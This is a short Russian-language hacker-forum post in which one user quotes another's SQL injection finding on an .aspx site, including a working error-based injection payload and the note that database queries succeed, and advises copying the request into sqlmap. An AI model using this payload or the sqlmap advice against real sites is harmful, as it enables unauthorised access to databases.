Тема
:
Ваши вопросы по уязвимостям.
Показать сообщение отдельно
#
6
07.06.2018, 20:01
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами:
5745206
Репутация:
1
Цитата:
Сообщение от
adirasta
↑
есть sql типа:
URL :
https://site.ru/uuurs.aspx?ctl00$menubartop$txtSearch=&ctl00$menub artop$btnsearch=%u0916%u094b%u091c
Parameter Name : ctl00%24ContentPlaceHolder1%24txt_uuursName
Parameter Type : POST
Attack Pattern : %27AND+1%3dcast(0x5f21403264696c656d6d61+as+varcha r(8000))+or+%271%27%3d%27
что делать? через софт запросы типа SELECT db_name() отвечает
правой кнопкой нижимаешь и копируешь запрос для sqlmap
Sensoft
Посмотреть профиль
Репутация
Найти все сообщения от Sensoft
Добавить в друзья
